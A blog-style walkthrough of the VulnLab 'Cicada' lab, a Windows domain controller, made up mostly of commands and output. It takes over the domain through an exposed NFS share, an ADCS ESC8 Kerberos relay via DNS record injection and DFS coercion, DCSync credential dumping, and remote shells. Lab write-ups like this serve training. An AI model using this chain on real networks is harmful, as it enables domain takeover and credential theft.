Post

VulnLab Cicada

VulnLab Cicada

VulnLab Cicada

Cicada

Recon

1
2
3
4
└─$ rustscan -g -r 1-65535 -a 10.10.97.220

10.10.97.220 -> [53,80,88,111,135,139,389,445,464,593,636,2049,3269,3268,3389,5985,9389]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
└─$ nmap -sC -sV -p53,80,88,111,135,139,389,445,464,593,636,2049,3269,3268,3389,5985,9389 10.10.97.220
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-16 00:13 +06
Nmap scan report for 10.10.97.220
Host is up (0.097s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-02-15 18:12:26Z)
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after:  2025-09-13T10:42:50
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after:  2025-09-13T10:42:50
2049/tcp open  nlockmgr      1-4 (RPC #100021)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after:  2025-09-13T10:42:50
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after:  2025-09-13T10:42:50
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Not valid before: 2025-02-14T18:10:41
|_Not valid after:  2025-08-16T18:10:41
|_ssl-date: 2025-02-15T18:13:51+00:00; -1m24s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC-JPQ225; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1m24s, deviation: 0s, median: -1m24s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-02-15T18:13:12
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 153.51 seconds

Root

We see NFS, which contains directory /profiles

1
2
3
└─$ showmount -e cicada.vl
Export list for cicada.vl:
/profiles (everyone)

We mount it and find user homes

1
└─$ sudo mount -t nfs cicada.vl:/profiles $PWD/share    
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
└─$ tree -L 2 share 
share
├── Administrator
│   ├── Documents
│   └── vacation.png
├── Daniel.Marshall
├── Debra.Wright
├── Jane.Carter
├── Jordan.Francis
├── Joyce.Andrews
├── Katie.Ward
├── Megan.Simpson
├── Richard.Gibbons
├── Rosie.Powell
│   ├── Documents
│   └── marketing.png
└── Shirley.West

14 directories, 2 files

Rosie.Powell has password in the picture

1
└─$ sudo cp share/Rosie.Powell/marketing.png .
1
└─$ sudo eog marketing.png

If we try creds, we receive message STATUS_NOT_SUPPORTED, meaning NTLM is not enabled

1
2
3
└─$ nxc smb cicada.vl -u 'rosie.powell' -p '<REDACTED>'
SMB         10.10.97.220    445    10.10.97.220     [*]  x64 (name:10.10.97.220) (domain:10.10.97.220) (signing:True) (SMBv1:False)
SMB         10.10.97.220    445    10.10.97.220     [-] 10.10.97.220\rosie.powell:<REDACTED> STATUS_NOT_SUPPORTED

So we authenticate using kerberos and the creds are valid

1
2
3
└─$ nxc smb dc-jpq225.cicada.vl -u 'rosie.powell' -p '<REDACTED>' -k
SMB         dc-jpq225.cicada.vl 445    dc-jpq225        [*]  x64 (name:dc-jpq225) (domain:cicada.vl) (signing:True) (SMBv1:False)
SMB         dc-jpq225.cicada.vl 445    dc-jpq225        [+] cicada.vl\rosie.powell:<REDACTED>

There’s ADCS, which is probably related to port 80

1
2
3
4
5
6
└─$ nxc ldap dc-jpq225.cicada.vl -u 'rosie.powell' -p '<REDACTED>' -k -M adcs
LDAP        dc-jpq225.cicada.vl 389    DC-JPQ225        [*] None (name:DC-JPQ225) (domain:cicada.vl)
LDAP        dc-jpq225.cicada.vl 389    DC-JPQ225        [+] cicada.vl\rosie.powell:<REDACTED> 
ADCS        dc-jpq225.cicada.vl 389    DC-JPQ225        [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        dc-jpq225.cicada.vl 389    DC-JPQ225        Found PKI Enrollment Server: DC-JPQ225.cicada.vl
ADCS        dc-jpq225.cicada.vl 389    DC-JPQ225        Found CN: cicada-DC-JPQ225-CA

Let’s get ticket and use it with certipy

1
2
3
4
└─$ getTGT.py cicada.vl/rosie.powell:'<REDACTED>' -dc-ip dc-jpq225.cicada.vl                                           
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in rosie.powell.ccache

We find that ADCS is vulnerable to ESC8

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
└─$ KRB5CCNAME=rosie.powell.ccache certipy find -k -no-pass -debug -dc-ip dc-jpq225.cicada.vl -ns 10.10.97.220 -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Domain retrieved from CCache: CICADA.VL
<SNIP>
Certificate Authorities
  0
    CA Name                             : cicada-DC-JPQ225-CA
    DNS Name                            : DC-JPQ225.cicada.vl
    Certificate Subject                 : CN=cicada-DC-JPQ225-CA, DC=cicada, DC=vl
    Certificate Serial Number           : 491BDD500EA006974F23E975392B6C4E
    Certificate Validity Start          : 2025-02-15 18:06:51+00:00
    Certificate Validity End            : 2525-02-15 18:16:51+00:00
    Web Enrollment                      : Enabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : CICADA.VL\Administrators
      Access Rights
        ManageCertificates              : CICADA.VL\Administrators
                                          CICADA.VL\Domain Admins
                                          CICADA.VL\Enterprise Admins
        ManageCa                        : CICADA.VL\Administrators
                                          CICADA.VL\Domain Admins
                                          CICADA.VL\Enterprise Admins
        Enroll                          : CICADA.VL\Authenticated Users
    [!] Vulnerabilities
      ESC8                              : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates                   : [!] Could not find any certificate templates

The MachineAccountQuota is set to 10, so we can create/join computer

1
2
3
4
5
└─$ nxc ldap dc-jpq225.cicada.vl -u 'rosie.powell' -p '<REDACTED>' -k -M maq 
LDAP        dc-jpq225.cicada.vl 389    DC-JPQ225        [*] None (name:DC-JPQ225) (domain:cicada.vl)
LDAP        dc-jpq225.cicada.vl 389    DC-JPQ225        [+] cicada.vl\rosie.powell:<REDACTED> 
MAQ         dc-jpq225.cicada.vl 389    DC-JPQ225        [*] Getting the MachineAccountQuota
MAQ         dc-jpq225.cicada.vl 389    DC-JPQ225        MachineAccountQuota: 10

According to multiple blogs, we can perform kerberos relay:

There is a way to do it from Windows machine and it requires MachineAccountQuota, but we will do it from linux so we don’t need that. The only thing we need is to to create A record pointing to our box, which has to have the form described in blogs. Knowing that by default all authenticated users can create A record if it doesn’t exist, we can abuse that:

1
2
3
└─$ bloodyAD.py --host dc-jpq225.cicada.vl -u 'rosie.powell' -p '<REDACTED>' -k -d 'cicada.vl' add dnsRecord 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.8.4.147 
[+] dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added
  

For coercing, use dfscoerce.py (feel free to try other coercion methods)

1
2
3
4
5
6
7
8
9
10
11
12
└─$ KRB5CCNAME=rosie.powell.ccache python3 dfscoerce.py -k -no-pass 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' dc-jpq225.cicada.vl   
[-] Connecting to ncacn_np:dc-jpq225.cicada.vl[\PIPE\netdfs]
[+] Successfully bound!
[-] Sending NetrDfsRemoveStdRoot!
NetrDfsRemoveStdRoot 
ServerName:                      'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA\x00' 
RootShare:                       'test\x00' 
ApiFlags:                        1 


DFSNM SessionError: code: 0x35 - ERROR_BAD_NETPATH - The network path was not found.

Make sure to pull latest update for krbrelayx and start it before coercing

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
└─$ krbrelayx.py -t 'http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp' --adcs --template DomainController -v 'DC-JPQ225$'
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server

[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.97.220
[*] HTTP server returned status code 200, treating as a successful login
[*] SMBD: Received connection from 10.10.97.220
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] Skipping user DC-JPQ225$ since attack was already performed
[*] GOT CERTIFICATE! ID 20
[*] Writing PKCS#12 certificate to ./DC-JPQ225$.pfx
[*] Certificate successfully written to file

We got our certificate, so now let’s get ticket for domain controller

1
2
3
4
5
6
7
8
9
10
11
12
└─$ gettgtpkinit.py -cert-pfx 'DC-JPQ225$.pfx' 'cicada.vl/DC-JPQ225$' DC-JPQ225.ccache
2025-02-16 02:25:54,246 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-02-16 02:25:54,540 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-02-16 02:26:05,870 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):                                                                                                                                                                        
2025-02-16 02:26:05,870 minikerberos INFO     c326fc1b13c7afc395e785808254612a8948420d28e3f1b481e8ed7a8b6c60d9                                                                                                                              
INFO:minikerberos:c326fc1b13c7afc395e785808254612a8948420d28e3f1b481e8ed7a8b6c60d9                                                                                                                                                          
2025-02-16 02:26:05,872 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

DCSync using the ticket

1
2
3
4
5
6
7
8
└─$ KRB5CCNAME=DC-JPQ225.ccache secretsdump.py -k -no-pass DC-JPQ225.cicada.vl 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>

Configure krb5.conf to be able to use evil-winrm

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
└─$ cat krb5.conf       
[libdefaults]
    default_realm = CICADA.VL
    dns_lookup_realm = true
    dns_lookup_kdc = true

[realms]
    CICADA.VL = {
        kdc = dc-jpq225.cicada.vl
        admin_server = dc-jpq225.cicada.vl
        default_domain = dc-jpq225.cicada.vl
    }

[domain_realm]
    cicada.vl = CICADA.VL
    .cicada.vl = CICADA.VL

Then use set env variables and connect

1
2
3
4
5
6
7
8
9
10
11
12
└─$ KRB5_CONFIG=krb5.conf KRB5CCNAME=administrator@DC-JPQ225.cicada.vl.ccache evil-winrm -i DC-JPQ225.cicada.vl -u administrator -r CICADA.VL 
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: User is not needed for Kerberos auth. Ticket will be used
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\dc-jpq225\profiles$\Administrator\Documents> 

Or simply wmiexec.py

1
2
3
4
5
6
7
8
└─$ KRB5CCNAME=administrator@DC-JPQ225.cicada.vl.ccache wmiexec.py -k -no-pass DC-JPQ225.cicada.vl  
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type \users\administrator\desktop\root.txt

https://api.vulnlab.com/api/v1/share?id=56b13afc-3db2-468d-9536-dd298b39aab4

This post is licensed under CC BY 4.0 by the author.